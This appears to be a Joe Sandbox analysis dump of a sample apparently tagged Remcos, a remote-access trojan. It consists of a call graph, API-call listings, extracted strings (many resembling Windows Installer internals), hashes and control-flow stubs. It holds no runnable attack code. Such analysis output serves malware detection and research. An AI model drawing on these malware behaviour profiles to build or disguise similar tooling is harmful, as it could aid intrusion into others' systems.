383e3a 3309->3311 3310->3309 3310->3311 3311->3019 3311->3023 3322 388bfd 3312->3322 3315 384494 3315->3085 3315->3089 3315->3090 3316 388cbd GetFileVersionInfoSizeW 3316->3315 3318 388bfd 16 API calls 3317->3318 3319 388ce4 3318->3319 3320 38453f 3319->3320 3321 388d03 GetFileVersionInfoW 3319->3321 3320->3094 3320->3098 3321->3320 3323 388c1b 3322->3323 3324 388c32 3322->3324 3325 388c1d Sleep 3323->3325 3329 38908c 14 API calls 3324->3329 3331 388c4e 3324->3331 3325->3325 3328 388c2f 3325->3328 3326 388c76 3326->3315 3326->3316 3327 388c66 GetProcAddress 3327->3326 3330 388c74 3327->3330 3328->3324 3329->3331 3330->3326 3331->3326 3331->3327 3332->3111 3334 388807 GlobalAlloc 3333->3334 3337 388817 3333->3337 3334->3337 3335 38884f GlobalFree 3336 38881e 3335->3336 3336->3123 3337->3335 3337->3336 3339 388885 3338->3339 3340 388875 3338->3340 3342 3888aa 3339->3342 3343 38888f GlobalAlloc 3339->3343 3340->3339 3341 38887a GlobalFree 3340->3341 3341->3339 3342->3131 3343->3342 3345 3886fa 3344->3345 3346 3886ea GlobalAlloc 3344->3346 3347 388730 GlobalFree 3345->3347 3348 388701 3345->3348 3346->3345 3347->3348 3348->3134 3352 3895f0 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 3349->3352 3351 385ee9 3352->3351 3354 38903e 3353->3354 3355 389012 3353->3355 3361 388f66 3354->3361 3355->3354 3357 389018 lstrlenW 3355->3357 3357->3354 3358 389024 3357->3358 3358->3354 3359 389086 3358->3359 3359->3169 3359->3170 3360 389046 3360->3359 3362 388f7e 3361->3362 3363 388ff2 GetSystemDirectoryW 3361->3363 3362->3363 3364 388f87 LoadLibraryW 3362->3364 3365 388ffe 3363->3365 3364->3365 3366 388f98 GetProcAddress 3364->3366 3365->3360 3367 388fab GetLastError 3366->3367 3368 388fb3 3366->3368 3369 388fcb FreeLibrary SetLastError 3367->3369 3368->3369 3371 388fd7 GetLastError 3368->3371 3369->3365 3371->3369 3373 388ed6 3372->3373 3374 388ee2 Sleep 3373->3374 3375 388ef4 3373->3375 3374->3373 3376 388f1a FreeLibrary 3375->3376 3377 387dc6 ExitProcess 3375->3377 3376->3377 3385 389930 3386 389942 3385->3386 3388 389950 @_EH4_CallFilterFunc@8 3385->3388 3387 3895e0 4 API calls 3386->3387 3387->3388 3389 387eb0 3492 383c24 EnterCriticalSection 3389->3492 3391 387edc 3392 387f61 3391->3392 3393 387ee4 RegOpenKeyExW 3391->3393 3396 3895e0 4 API calls 3392->3396 3394 387f11 3393->3394 3395 387f05 RegCloseKey 3393->3395 3501 3839ae GetEnvironmentVariableW 3394->3501 3395->3394 3397 388586 3396->3397 3402 3831a9 56 API calls 3403 387f4f 3402->3403 3404 387f68 3403->3404 3405 387f57 3403->3405 3513 388745 3404->3513 3405->3392 3407 387f5b CoUninitialize 3405->3407 3407->3392 3409 388745 2 API calls 3410 387fa9 3409->3410 3411 388745 2 API calls 3410->3411 3412 387fba 3411->3412 3413 388745 2 API calls 3412->3413 3414 387fcb 3413->3414 3415 388745 2 API calls 3414->3415 3416 387fdc 3415->3416 3417 3884e8 3416->3417 3421 38801e MakeAbsoluteSD 3416->3421 3418 3884ec CoUninitialize 3417->3418 3419 3884f2 3417->3419 3418->3419 3420 388513 3419->3420 3422 38850c GlobalFree 3419->3422 3423 38852c 3420->3423 3424 388525 GlobalFree 3420->3424 3425 388079 3421->3425 3426 388062 3421->3426 3422->3420 3427 388545 3423->3427 3430 38853e GlobalFree 3423->3430 3424->3423 3434 38809e 3425->3434 3456 3880cd 3425->3456 3428 38806c GetLastError 3426->3428 3429 388066 CoUninitialize 3426->3429 3431 38855e 3427->3431 3432 388557 GlobalFree 3427->3432 3428->3419 3429->3428 3430->3427 3431->3392 3433 388570 GlobalFree 3431->3433 3432->3431 3433->3392 3436 3859f2 18 API calls 3434->3436 3435 38816a 3437 383c24 26 API calls 3435->3437 3438 3880aa GetLastError 3436->3438 3439 388178 3437->3439 3440 383c24 26 API calls 3438->3440 3441 3880ba 3439->3441 3442 388180 3439->3442 3440->3441 3441->3419 3444 3880c2 CoUninitialize 3441->3444 3517 38395e 3442->3517 3444->3419 3445 388105 3448 3859f2 18 API calls 3445->3448 3452 388111 3448->3452 3449 38821b 3450 388407 GetLastError 3449->3450 3453 388223 3449->3453 3451 388400 3450->3451 3454 3859f2 18 API calls 3451->3454 3455 383c24 26 API calls 3452->3455 3460 388256 3453->3460 3461 388246 GetLastError 3453->3461 3457 388419 GetLastError 3454->3457 3455->3441 3456->3435 3456->3445 3458 383c24 26 API calls 3457->3458 3459 388429 3458->3459 3462 38845f 3459->3462 3463 388437 EnterCriticalSection CloseHandle LeaveCriticalSection 3459->3463 3471 388276 GetLastError 3460->3471 3474 388286 3460->3474 3461->3451 3464 38848f 3462->3464 3465 388467 EnterCriticalSection CloseHandle LeaveCriticalSection 3462->3465 3463->3462 3466 3884bf 3464->3466 3467 388497 EnterCriticalSection CloseHandle LeaveCriticalSection 3464->3467 3465->3464 3468 3884c9 3466->3468 3469 3884c3 CoUninitialize 3466->3469 3467->3466 3470 3884db DeleteCriticalSection 3468->3470 3472 383c24 26 API calls 3468->3472 3469->3468 3470->3419 3471->3451 3472->3470 3473 383c24 26 API calls 3473->3474 3474->3459 3474->3473 3475 3882a7 CoRegisterClassObject 3474->3475 3476 3882e0 3474->3476 3475->3451 3475->3474 3477 383c24 26 API calls 3476->3477 3485 3882ea 3477->3485 3478 388333 MsgWaitForMultipleObjects 3480 388388 PeekMessageW 3478->3480 3478->3485 3479 385bf0 GetModuleHandleExW GetProcAddress FreeLibrary FreeLibrary 3479->3485 3481 38836e TranslateMessage DispatchMessageW 3480->3481 3480->3485 3481->3480 3482 3883e0 3483 383c24 26 API calls 3482->3483 3484 3883de 3483->3484 3521 38858a PostThreadMessageW 3484->3521 3485->3459 3485->3478 3485->3479 3485->3482 3485->3484 3487 383c24 26 API calls 3485->3487 3488 3883c6 GetLastError GetLastError 3485->3488 3487->3485 3490 3859f2 18 API calls 3488->3490 3489 3883ee 3489->3459 3491 3883f7 CoRevokeClassObject 3489->3491 3490->3484 3491->3459 3493 383c40 3492->3493 3494 383c47 3492->3494 3495 383cde LeaveCriticalSection 3493->3495 3496 383c64 SetServiceStatus 3494->3496 3522 385bf0 GetModuleHandleExW 3494->3522 3495->3391 3496->3495 3499 383ccc GetLastError 3496->3499 3500 3859f2 18 API calls 3499->3500 3500->3495 3502 3839db 3501->3502 3503 3895e0 4 API calls 3502->3503 3504 383a18 3503->3504 3505 383072 3504->3505 3506 383088 3505->3506 3507 383080 Sleep 3506->3507 3508 383090 3506->3508 3507->3506 3509 383099 memset 3508->3509 3510 3830b0 3508->3510 3509->3510 3511 3830d8 3510->3511 3528 382f93 GetCurrentThread OpenThreadToken 3510->3528 3511->3402 3514 38875c GlobalAlloc 3513->3514 3515 388770 memset 3513->3515 3516 387f98 3514->3516 3515->3516 3516->3409 3518 38398c InitializeCriticalSection CreateEventW CreateEventW 3517->3518 3519 38397c 3517->3519 3518->3449 3518->3450 3520 3831a9 56 API calls 3519->3520 3520->3518 3521->3489 3523 385c10 GetProcAddress 3522->3523 3525 385c48 3522->3525 3524 385c3f FreeLibrary 3523->3524 3526 385c24 3523->3526 3524->3525 3525->3496 3526->3524 3527 385c32 FreeLibrary 3526->3527 3527->3525 3529 382fd2 GetLastError 3528->3529 3534 382ffa 3528->3534 3530 383054 3529->3530 3531 382fe3 GetCurrentProcess OpenProcessToken 3529->3531 3536 3895e0 4 API calls 3530->3536 3531->3530 3531->3534 3532 383027 AdjustTokenPrivileges CloseHandle GetLastError 3532->3530 3533 383003 LookupPrivilegeValueW 3533->3534 3535 383065 CloseHandle 3533->3535 3534->3532 3534->3533 3535->3530 3537 383063 3536->3537 3537->3511 3549 3895b0 3552 389a60 3549->3552 3551 3895d0 3554 389a94 __except_handler4 __IsNonwritableInCurrentImage 3552->3554 3553 389af7 __except_handler4 3553->3551 3554->3553 3559 3899d4 RtlUnwind 3554->3559 3556 389bfd 3556->3551 3557 389bf7 ?terminate@ 3557->3556 3558 389b7d __except_handler4 3558->3556 3558->3557 3560 3899e9 3559->3560 3560->3558 3564 387db7 3565 387dba 3564->3565 3566 388f5a 2 API calls 3565->3566 3567 387dc6 ExitProcess 3566->3567 3568 3844a9 3569 3844c6 3568->3569 3570 384596 3569->3570 3572 3844dd GlobalAlloc 3569->3572 3573 3844f6 3569->3573 3571 3887d4 GlobalFree 3570->3571 3574 3845aa 3571->3574 3572->3573 3575 384588 3573->3575 3577 38451b 3573->3577 3578 38450e GlobalFree 3573->3578 3576 3887d4 GlobalFree 3574->3576 3575->3570 3581 384590 GlobalFree 3575->3581 3579 3845b5 3576->3579 3587 388cd0 17 API calls 3577->3587 3578->3577 3580 3887d4 GlobalFree 3579->3580 3582 3845c0 3580->3582 3581->3570 3583 382e35 _vsnwprintf 3584 3845f9 3583->3584 3584->3575 3586 382e35 _vsnwprintf 3584->3586 3585 38453f 3585->3575 3585->3583 3586->3575 3587->3585 3591 385020 3596 384cec 3591->3596 3594 3895e0 4 API calls 3595 38505f 3594->3595 3597 384d2e 3596->3597 3598 384d48 lstrlenW lstrlenW lstrlenW lstrlenW 3597->3598 3599 384df3 lstrlenW lstrlenW 3597->3599 3600 3886d5 2 API calls 3598->3600 3601 3886d5 2 API calls 3599->3601 3607 384d9a 3600->3607 3601->3607 3602 384d9e 3603 3886b2 GlobalFree 3602->3603 3604 384de2 3603->3604 3605 3895e0 4 API calls 3604->3605 3606 384df1 3605->3606 3606->3594 3607->3602 3608 384e7a 3607->3608 3613 383e90 3607->3613 3608->3602 3618 3856b2 3608->3618 3614 383ea6 3613->3614 3617 383f24 3613->3617 3615 383eff lstrlenW lstrlenW 3614->3615 3614->3617 3616 3887f5 2 API calls 3615->3616 3616->3617 3617->3608 3620 3856cb 3618->3620 3621 384ea4 3618->3621 3619 38579a WideCharToMultiByte 3619->3621 3620->3619 3620->3621 3622 3857c0 3621->3622 3623 3857e5 LoadLibraryExW 3622->3623 3624 38597c 3623->3624 3625 385806 GetProcAddress 3623->3625 3626 3895e0 4 API calls 3624->3626 3627 38581c 3625->3627 3628 385975 FreeLibrary 3625->3628 3629 385989 3626->3629 3630 38585c GetSystemDefaultLangID 3627->3630 3640 385912 3627->3640 3628->3624 3629->3602 3631 38588f memset FormatMessageW 3630->3631 3634 385873 3630->3634 3632 38591b 3631->3632 3633 3858cf 3631->3633 3641 382dd2 3632->3641 3635 38598b 3633->3635 3636 3858e1 WideCharToMultiByte 3633->3636 3634->3631 3634->3640 3638 389728 4 API calls 3635->3638 3636->3640 3639 385990 3638->3639 3640->3628 3642 382de1 3641->3642 3643 382df1 _vsnprintf 3642->3643 3644 382e11 3642->3644 3643->3644 3644->3640 3645 388a20 3648 3888b4 3645->3648 3649 3888d2 3648->3649 3651 3888e6 3648->3651 3650 3888d4 Sleep 3649->3650 3650->3650 3650->3651 3654 38908c 14 API calls 3651->3654 3655 388905 3651->3655 3652 38892b 3653 38891d GetProcAddress 3653->3652 3654->3655 3655->3652 3655->3653 3656 3847a0 3657 3847b7 3656->3657 3658 3847ac 3656->3658 3658->3657 3660 385991 3658->3660 3661 38599d SetLastError 3660->3661 3663 3859b0 3660->3663 3662 3859a9 3661->3662 3662->3657 3664 3859ca SetLastError 3663->3664 3665 3859f0 3663->3665 3664->3662 3665->3661 3677 387e20 RegisterServiceCtrlHandlerW 3678 387e39 GetLastError 3677->3678 3679 387e4d 3677->3679 3680 3859f2 18 API calls 3678->3680 3681 383c24 26 API calls 3679->3681 3687 387e4b 3680->3687 3682 387e60 3681->3682 3683 387e64 CreateThread 3682->3683 3682->3687 3684 387e7e GetLastError 3683->3684 3685 387e90 3683->3685 3688 383c24 26 API calls 3684->3688 3686 387e9a CloseHandle 3685->3686 3685->3687 3686->3687 3688->3687 3689 3885a0 3690 3885d9 3689->3690 3691 3885ad 3689->3691 3692 388605 3690->3692 3695 385bf0 4 API calls 3690->3695 3691->3692 3694 385bf0 4 API calls 3691->3694 3693 383c24 26 API calls 3692->3693 3703 388603 3693->3703 3696 3885be 3694->3696 3697 3885ee 3695->3697 3696->3692 3698 3885f2 3696->3698 3699 3885cb SetEvent 3696->3699 3697->3692 3697->3698 3700 383c24 26 API calls 3698->3700 3699->3692 3701 3885fe 3700->3701 3704 38858a PostThreadMessageW 3701->3704 3704->3703 3705 385320 3710 384ebd lstrlenW 3705->3710 3708 384cec 26 API calls 3709 385348 3708->3709 3711 384ece 3710->3711 3711->3708 3712 38a220 3713 38a22a CloseHandle 3712->3713 3714 38a231 3712->3714 3713->3714 3718 389c10 SetUnhandledExceptionFilter 3719 388d10 3720 388bfd 16 API calls 3719->3720 3721 388d24 3720->3721 3722 383a90 3723 383ab6 3722->3723 3727 383aac 3722->3727 3724 383b31 WaitForSingleObject 3723->3724 3725 383b46 3723->3725 3723->3727 3724->3725 3724->3727 3726 385bf0 4 API calls 3725->3726 3725->3727 3726->3727 3731 387d89 3732 387da7 3731->3732 3733 387d9f 3731->3733 3735 38637a 3733->3735 3736 386380 3735->3736 3737 386391 3735->3737 3736->3737 3738 386395 UnhandledExceptionFilter 3736->3738 3737->3732 3738->3732 3742 384f00 3743 384f28 3742->3743 3744 384f91 3742->3744 3746 38878a 2 API calls 3743->3746 3745 38878a 2 API calls 3744->3745 3747 384fa9 3745->3747 3750 384f43 3746->3750 3748 384ebd lstrlenW 3747->3748 3756 384f47 3747->3756 3749 384fb9 3748->3749 3752 384fe3 3749->3752 3758 384fbd 3749->3758 3753 3887d4 GlobalFree 3750->3753 3750->3756 3751 3887d4 GlobalFree 3755 38500c 3751->3755 3754 384cec 26 API calls 3752->3754 3753->3744 3754->3756 3757 3895e0 4 API calls 3755->3757 3756->3751 3759 38501c 3757->3759 3758->3756 3761 384b06 3758->3761 3762 384b2b 3761->3762 3763 384b8f 3762->3763 3765 3856b2 WideCharToMultiByte 3762->3765 3764 384bbb 3763->3764 3766 3857c0 12 API calls 3763->3766 3767 3895e0 4 API calls 3764->3767 3765->3763 3766->3764 3768 384bd2 3767->3768 3768->3756 3772 389280 3773 389285 3772->3773 3781 389c98 GetModuleHandleW 3773->3781 3775 389291 __set_app_type __p__fmode __p__commode 3776 3892c9 3775->3776 3777 3892de 3776->3777 3778 3892d2 __setusermatherr 3776->3778 3783 389ecd _controlfp 3777->3783 3778->3777 3780 3892e3 3782 389ca9 3781->3782 3782->3775 3783->3780 3784 388b80 3785 388adc 3 API calls 3784->3785 3786 388b8f 3785->3786 3793 385f04 3795 385f19 3793->3795 3794 385f56 3795->3794 3796 385f45 memcpy 3795->3796 3796->3794 2795 38a17a 2796 38a0c9 2795->2796 2798 38915b 2796->2798 2812 3890e9 2798->2812 2800 389192 2801 3891c4 2800->2801 2802 389196 LdrResolveDelayLoadedAPI 2800->2802 2804 38924d GetProcAddress 2801->2804 2805 3891e1 LoadLibraryExA 2801->2805 2809 389267 2802->2809 2806 38925f DelayLoadFailureHook 2804->2806 2808 389258 2804->2808 2805->2806 2807 3891f0 2805->2807 2806->2809 2810 389240 FreeLibrary 2807->2810 2811 389202 2807->2811 2808->2809 2809->2796 2810->2811 2811->2804 2811->2806 2813 3890fa 2812->2813 2814 3890f6 2812->2814 2815 3890fe 2813->2815 2816 389102 GetModuleHandleW 2813->2816 2814->2800 2815->2800 2817 389123 GetProcAddress 2816->2817 2818 389113 GetModuleHandleW 2816->2818 2819 38914b 2817->2819 2820 389137 GetProcAddress 2817->2820 2818->2817 2818->2819 2819->2800 2820->2819 3848 3892f0 __getmainargs 3803 385070 3804 384ebd lstrlenW 3803->3804 3806 38509c 3804->3806 3805 3850db 3831 383f4c StgOpenStorage 3805->3831 3806->3805 3809 385140 3806->3809 3814 3850a0 3806->3814 3812 382e35 _vsnwprintf 3809->3812 3810 385131 3810->3814 3816 3851e1 memset 3810->3816 3811 383e90 4 API calls 3813 385111 3811->3813 3817 385163 3812->3817 3818 385126 3813->3818 3822 383f4c 6 API calls 3813->3822 3815 3895e0 4 API calls 3814->3815 3819 38530d 3815->3819 3820 38521a 3816->3820 3817->3814 3821 384cec 26 API calls 3817->3821 3823 3886b2 GlobalFree 3818->3823 3820->3814 3824 38521e _wcsicmp 3820->3824 3825 385184 3821->3825 3822->3818 3823->3810 3824->3814 3825->3814 3826 383e90 4 API calls 3825->3826 3827 3851ad 3826->3827 3828 3851c4 3827->3828 3829 384cec 26 API calls 3827->3829 3830 3886b2 GlobalFree 3828->3830 3829->3828 3830->3814 3834 383f81 3831->3834 3835 383f9c 3831->3835 3832 3895e0 4 API calls 3833 3841d7 3832->3833 3833->3810 3833->3811 3834->3832 3835->3834 3836 38416f MultiByteToWideChar 3835->3836 3836->3834 3837 384970 3840 384aad 3837->3840 3841 384995 3837->3841 3838 3895e0 4 API calls 3839 384ae0 3838->3839 3840->3838 3841->3840 3842 384a7d lstrcmpW 3841->3842 3842->3840 3843 384a8d lstrcmpW 3842->3843 3843->3840 3844 384a9d lstrcmpW 3843->3844 3844->3840 3849 383cf0 3850 383d0b LoadLibraryW 3849->3850 3851 383d23 GetProcAddress 3849->3851 3850->3851 3852 383d39 3850->3852 3851->3852 3853 382cf5 3856 389885 3853->3856 3859 3897e2 3856->3859 3860 3897ee 3859->3860 3861 3897ff _onexit 3860->3861 3862 389815 _lock __dllonexit 3860->3862 3865 382cfa 3861->3865 3866 38987c _unlock 3862->3866 3866->3865 3877 384be0 3879 384c0a 3877->3879 3878 3895e0 4 API calls 3880 384cd2 3878->3880 3881 384cba 3879->3881 3882 383e90 4 API calls 3879->3882 3881->3878 3884 384c8a 3882->3884 3883 3886b2 GlobalFree 3883->3881 3884->3883 3870 3846e0 3871 3846eb lstrlenW 3870->3871 3873 384700 3870->3873 3872 3886d5 2 API calls 3871->3872 3872->3873 3888 382ce5 3889 389885 4 API calls 3888->3889 3890 382cea 3889->3890 3891 385f66 3892 385f82 3891->3892 3893 3860a7 3892->3893 3895 3860d5 3892->3895 3896 38604f memcpy 3892->3896 3897 385ff0 memcpy 3892->3897 3894 3860c1 memcpy 3893->3894 3893->3895 3894->3895 3896->3892 3897->3892 3907 38a250 3908 38a26c 3907->3908 3909 38a260 GlobalFree 3907->3909 3909->3908 3910 388b50 3911 388a55 3 API calls 3910->3911 3912 388b5f 3911->3912 3916 387dd0 StartServiceCtrlDispatcherW 3917 387dfc GetLastError 3916->3917 3918 387e13 3916->3918 3919 3859f2 18 API calls 3917->3919 3920 387e0e 3919->3920 3921 383bd0 3922 383bdb 3921->3922 3923 383be4 3921->3923 3923->3922 3924 383c0e 3923->3924 3926 383c06 PostQuitMessage 3923->3926 3925 383c24 26 API calls 3924->3925 3925->3922 3926->3924 3930 3894d3 3931 3894ee 3930->3931 3932 3894e7 _exit 3930->3932 3933 389502 3931->3933 3934 3894f7 _cexit 3931->3934 3932->3931 3934->3933 3935 38a1d4 3936 3895e0 4 API calls 3935->3936 3937 38a1de 3936->3937 3937->3937 3941 38a240 DeleteCriticalSection 3942 385640 3943 38566e 3942->3943 3945 38568e 3942->3945 3944 385673 WideCharToMultiByte 3943->3944 3943->3945 3944->3945 3946 388940 3947 3888b4 16 API calls 3946->3947 3948 388954 3947->3948 3949 385441 lstrlenW 3950 385480 3949->3950 3955 38548d 3949->3955 3951 388665 2 API calls 3950->3951 3951->3955 3952 3854a7 3953 3886b2 GlobalFree 3952->3953 3954 3855a9 3953->3954 3956 3895e0 4 API calls 3954->3956 3955->3952 3957 3854da CoInitialize 3955->3957 3958 3855b8 3956->3958 3957->3952 3959 3854fb LoadLibraryExW 3957->3959 3960 38551b GetLastError 3959->3960 3961 38550b SetCurrentDirectoryW 3959->3961 3962 385530 SetThreadToken 3960->3962 3963 385527 3960->3963 3961->3960 3961->3962 3964 38553e GetLastError 3962->3964 3965 38554a 3962->3965 3963->3962 3964->3965 3966 385557 GetProcAddress 3965->3966 3970 385571 3965->3970 3967 385565 GetLastError 3966->3967 3966->3970 3967->3970 3968 38558c FreeLibrary 3969 385593 CoUninitialize 3968->3969 3969->3952 3970->3968 3970->3969

                                                                Executed Functions

                                                                Function 003863E3 Relevance: 217.0, APIs: 82, Strings: 41, Instructions: 1785registrywindowthreadCOMMON
                                                                Download Yara Rule
                                                                APIs
                                                                • GetVersionExW.KERNEL32(?), ref: 00386434
                                                                • GetCurrentProcess.KERNEL32(0000001A,?,00000004,00000000), ref: 00386456
                                                                • NtQueryInformationProcess.NTDLL ref: 0038645D
                                                                • GetCommandLineW.KERNEL32 ref: 0038649F
                                                                • GetStdHandle.KERNEL32(000000F5), ref: 003864F3
                                                                • GetFileType.KERNEL32(00000000), ref: 00386504
                                                                • memset.MSVCRT ref: 0038652B
                                                                • memset.MSVCRT ref: 0038653D
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?), ref: 0038661D
                                                                • RegCloseKey.ADVAPI32(?,?), ref: 00386649
                                                                • RegQueryValueExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00386672
                                                                • RegCloseKey.ADVAPI32(?), ref: 0038667E
                                                                • CompareStringW.KERNEL32(00000409,?,00000002,?,00381994,000000FF), ref: 003868CA
                                                                • CompareStringW.KERNEL32(00000409,00000001,00000002,?,package,?), ref: 003868F9
                                                                • CompareStringW.KERNEL32(00000409,00000001,00000002,?,003817F0,000000FF), ref: 003869BB
                                                                • memset.MSVCRT ref: 00386B2C
                                                                • GlobalFree.KERNEL32(?), ref: 00386BA4
                                                                • lstrlenW.KERNEL32(?,00000063,?), ref: 00386C69
                                                                • GlobalFree.KERNEL32(00000000), ref: 00386F6C
                                                                • CoInitialize.OLE32(00000000), ref: 003870D8
                                                                • CoRegisterClassObject.OLE32(003825E0,0038B064,00000004,00000001,0038C6AC), ref: 0038710F
                                                                • GetCurrentThread.KERNEL32 ref: 00387225
                                                                • OpenThreadToken.ADVAPI32(00000000), ref: 0038722C
                                                                • GetLastError.KERNEL32 ref: 0038723F
                                                                • GetMessageW.USER32(?,00000000,00000000,00000000), ref: 00387CAE
                                                                • TranslateMessage.USER32(?), ref: 00387CD0
                                                                • DispatchMessageW.USER32(?), ref: 00387CDE
                                                                Strings
                                                                • update, xrefs: 00386705
                                                                • ServerMain (CA): Connect to remote object failed., xrefs: 003877F8
                                                                • MSIPATCHREMOVE=, xrefs: 00386774
                                                                • ServerMain (CA): Connection to Service failed., xrefs: 0038769B
                                                                • ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type, xrefs: 00387460
                                                                • ServerMain (CA): Wrong command line, xrefs: 003871D0
                                                                • OpenProcessToken failed with %d, xrefs: 003873F1
                                                                • ServerMain (CA): Could not open synchronization handle., xrefs: 003877BB, 00387ABF
                                                                • ServerMain (CA): Impersonation token not saved., xrefs: 003878DD
                                                                • log, xrefs: 0038684E
                                                                • package, xrefs: 00386767, 00386795, 003868E8
                                                                • /qb!- REBOOTPROMPT=S, xrefs: 003867E1
                                                                • ServerMain (CA): Create Custom Action Server failed., xrefs: 003876CD
                                                                • quiet, xrefs: 003867B8
                                                                • RUVEH?IJDqXFAtPYZlgmnc, xrefs: 00386BDC, 00386DB3, 00386FDC
                                                                • help, xrefs: 0038679A
                                                                • REBOOT=ReallySuppress, xrefs: 003867FF
                                                                • q, xrefs: 00386AFA
                                                                • ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type, xrefs: 0038742F
                                                                • ServerMain (CA): CoInitializeSecurity failed, xrefs: 003875F7
                                                                • norestart, xrefs: 003867F4
                                                                • ServerMain (CA): Access to token failed, xrefs: 00387250
                                                                • Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries, xrefs: 003865D9
                                                                • ServerMain (CA): Error: Access to SD, xrefs: 003874C5
                                                                • ServerMain (CA): Error: Format SD, xrefs: 003875AC
                                                                • uninstall, xrefs: 00386715
                                                                • ServerMain (CA): Wait on synchronization event failed, xrefs: 003872E1
                                                                • /l*, xrefs: 00386859
                                                                • promptrestart, xrefs: 00386830
                                                                • passive, xrefs: 003867D6
                                                                • forcerestart, xrefs: 00386812
                                                                • ServerMain (CA): Error: Watch for change-of-owning-process signal, xrefs: 0038764A
                                                                • ServerMain (CA): Process not registered with service., xrefs: 00387788
                                                                • REBOOT=Force, xrefs: 0038681D
                                                                • REBOOTPROMPT="", xrefs: 0038683B
                                                                • PATCH=, xrefs: 00386710
                                                                • ServerMain (CA): Error: Watch for the shutdown signal, xrefs: 00387621
                                                                • ServerMain (CA): Parsing command line failed, xrefs: 003871E1
                                                                • /qn, xrefs: 003867C3
                                                                • OLEAUT32.dll, xrefs: 003870DE
                                                                • ServerMain (CA): Open synchronization event failed, xrefs: 00387C8E
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: CompareMessageQueryStringmemset$CloseCurrentFreeGlobalProcessThreadValue$ClassCommandDispatchErrorFileHandleInformationInitializeLastLineObjectOpenRegisterTokenTranslateTypeVersionlstrlen
                                                                • String ID: /l*$/qb!- REBOOTPROMPT=S$/qn$MSIPATCHREMOVE=$OLEAUT32.dll$OpenProcessToken failed with %d$PATCH=$REBOOT=Force$REBOOT=ReallySuppress$REBOOTPROMPT=""$RUVEH?IJDqXFAtPYZlgmnc$ServerMain (CA): Access to token failed$ServerMain (CA): CoInitializeSecurity failed$ServerMain (CA): Connect to remote object failed.$ServerMain (CA): Connection to Service failed.$ServerMain (CA): Could not open synchronization handle.$ServerMain (CA): Create Custom Action Server failed.$ServerMain (CA): Error: Access to SD$ServerMain (CA): Error: Format SD$ServerMain (CA): Error: Watch for change-of-owning-process signal$ServerMain (CA): Error: Watch for the shutdown signal$ServerMain (CA): Error: icacContext in CA server should be AISImpersonated but is not any impersonated type$ServerMain (CA): Error: icacContext in CA server should be EEUI but is not any impersonated type$ServerMain (CA): Impersonation token not saved.$ServerMain (CA): Open synchronization event failed$ServerMain (CA): Parsing command line failed$ServerMain (CA): Process not registered with service.$ServerMain (CA): Wait on synchronization event failed$ServerMain (CA): Wrong command line$Software\Microsoft\Windows\CurrentVersion\Installer\RunOnceEntries$forcerestart$help$log$norestart$package$passive$promptrestart$q$quiet$uninstall$update
                                                                • API String ID: 1475639937-2370891382
                                                                • Opcode ID: 3fc2fd4539cef3a83c5f5febf3fe966602856f0dfa2c54820175dfa09f144585
                                                                • Instruction ID: 20d3762fdb51336aeb6d87af293af6964f917860124ad73a1486c0d651e938a0
                                                                • Opcode Fuzzy Hash: 3fc2fd4539cef3a83c5f5febf3fe966602856f0dfa2c54820175dfa09f144585
                                                                • Instruction Fuzzy Hash: 49E2E1711083419FDB22EF24C845BAEB7EAFB84314F2549AEF58987290EB70DC45CB52
                                                                Function 00388ADC Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 35librarysleeploaderCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
                                                                control_flow_graph 673 388adc-388ae4 674 388aee-388af6 673->674 675 388af8-388b05 674->675 676 388ae6-388ae8 Sleep 674->676 677 388b24-388b26 675->677 678 388b07-388b09 675->678 676->674 679 388b28-388b3b GetProcAddress 677->679 681 388b3d-388b42 677->681 678->679 680 388b0b-388b1d LoadLibraryW 678->680 679->681 682 388b47-388b4e 679->682 680->679 683 388b1f 680->683 681->682 683->677
                                                                APIs
                                                                • Sleep.KERNEL32(0000000A,?,00388B8F,?,?), ref: 00388AE8
                                                                • LoadLibraryW.KERNELBASE(COMCTL32,00388B8F,?,?), ref: 00388B10
                                                                • GetProcAddress.KERNEL32(?,InitCommonControlsEx), ref: 00388B2E
                                                                Strings
                                                                Memory Dump Source
                                                                • Source File: 0000000A.00000002.2755420592.0000000000381000.00000020.00000001.01000000.00000008.sdmp, Offset: 00380000, based on PE: true
                                                                • Associated: 0000000A.00000002.2755400705.0000000000380000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038D000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                • Associated: 0000000A.00000002.2755441236.000000000038F000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                                Joe Sandbox IDA Plugin
                                                                • Snapshot File: hcaresult_10_2_380000_remcos.jbxd
                                                                Similarity
                                                                • API ID: AddressLibraryLoadProcSleep
                                                                • String ID: COMCTL32$InitCommonControlsEx
                                                                • API String ID: 188063004-472741233
                                                                • Opcode ID: 054879b734f1841aefa2758b4cc5e074dd1127a0bacdcb89069c83d9976c5686
                                                                • Instruction ID: cdb558701f11ea66c5ca808d4f73b9ca387acf7259439251de6a5cf3e19d80a3
                                                                • Opcode Fuzzy Hash: 054879b734f1841aefa2758b4cc5e074dd1127a0bacdcb89069c83d9976c5686
                                                                • Instruction Fuzzy Hash: 7CF06DB16503828BD7137B35AC18B127BECBBE5345F9504E2E900D62A0EF34C801CB60
                                                                Function 00389330 Relevance: 13.6, APIs: 9, Instructions: 144sleepCOMMON
                                                                Download Yara Rule

                                                                Control-flow Graph

                                                                • Executed
                                                                • Not Executed
